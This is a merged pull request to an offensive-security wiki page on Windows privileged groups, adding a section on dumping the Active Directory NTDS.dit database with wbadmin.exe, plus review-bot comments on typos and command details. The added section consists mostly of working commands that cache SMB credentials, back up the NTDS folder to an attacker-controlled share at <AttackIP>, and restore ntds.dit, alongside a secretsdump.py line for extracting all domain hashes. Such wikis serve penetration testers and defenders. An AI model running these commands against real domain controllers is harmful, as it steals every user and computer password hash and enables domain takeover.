Merge pull request #738 from manesec/master

Update privileged-groups-and-token-privileges.md
Carlos Polop 2023-11-06 00:20:23 +01:00 committed by GitHub
commit 4f348a96e0
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23


@ -154,6 +154,8 @@ For instance, you can directly access the Domain Controller file system:
You can abuse this access to **steal** the active directory database **`NTDS.dit`** to get all the **NTLM hashes** for all user and computer objects in the domain.
#### Using diskshadow.exe to dumo NTDS.dit
Using [**diskshadow**](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) you can **create a shadow copy** of the **`C` drive** and in the `F` drive for example. The, you can steal the `NTDS.dit` file from this shadow copy as it won't be in use by the system:
```
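Review bot: the heading in this hunk reads "dumo NTDS.dit" (should be "dump") and the sentence after it opens "The, you can steal" (should be "Then, you can steal"); "create a shadow copy of the C drive and in the F drive for example" would also read better as "create a shadow copy of the `C` drive and expose it as the `F` drive, for example". Since the same heading typo is repeated in the new wbadmin section below, both should be corrected in this PR rather than left for a follow-up.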
@ -200,6 +202,38 @@ Finally you can **get all the hashes** from the **`NTDS.dit`**:
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```
#### Using wbadmin.exe to dumo NTDS.dit
Using wbadmin.exe is very similar to diskshadow.exe, the wbadmin.exe utility is a command line utility built into Windows, since Windows Vista/Server 2008.
Before using it, you need to [**setup ntfs filesystem for smb server**](https://gist.github.com/manesec/9e0e8000446b966d0f0ef74000829801) on the attacker machine.
When you finished to setup smb server, you need to cache the smb credential on target machine:
```
# cache the smb credential.
net use X: \\<AttackIP>\sharename /user:smbuser password
# check if working.
dir X:\
```
If no error, use wbadmin.exe to exploit it:
```
# Start backup the system.
# In here, no need to use `X:\`, just using `\\<AttackIP>\sharename` should be ok.
echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
# Look at the backup version to get time.
wbadmin get versions
# Restore the version to dump ntds.dit.
echo "Y" | wbadmin start recovery -version:10/09/2023-23:48 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
```
If it successful, it will dump into `C:\ntds.dit`.
[DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s)
## DnsAdmins
A user who is member of the **DNSAdmins** group or have **write privileges to a DNS** server object can load an **arbitrary DLL** with **SYSTEM** privileges on the **DNS server**.\
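Review bot: the recovery command hard-codes `-version:10/09/2023-23:48`, which is the identifier from the author's own run; it should be a labelled placeholder such as `-version:<version>` with a sentence saying the value is taken from the preceding `wbadmin get versions` output, otherwise readers will copy a version that does not exist on their system. Two smaller points in the same hunk: under cmd.exe `echo "Y"` emits the quotes literally, so `echo Y |` or wbadmin's `-quiet` switch (accepted by both `start backup` and `start recovery`) is the more reliable way to suppress the confirmation prompt, and `-include:c:\windows\ntds` assumes the default database location, which is worth stating. Wording: the heading repeats the "dumo" typo; "Using wbadmin.exe is very similar to diskshadow.exe, the wbadmin.exe utility is a command line utility built into Windows, since Windows Vista/Server 2008" is a comma splice and should be two sentences; "When you finished to setup smb server" should read "When you have finished setting up the SMB server"; "If it successful" should be "If successful"; and "setup ntfs filesystem for smb server" should be "set up an NTFS filesystem for the SMB server", since the link target is a gist that later readers cannot edit.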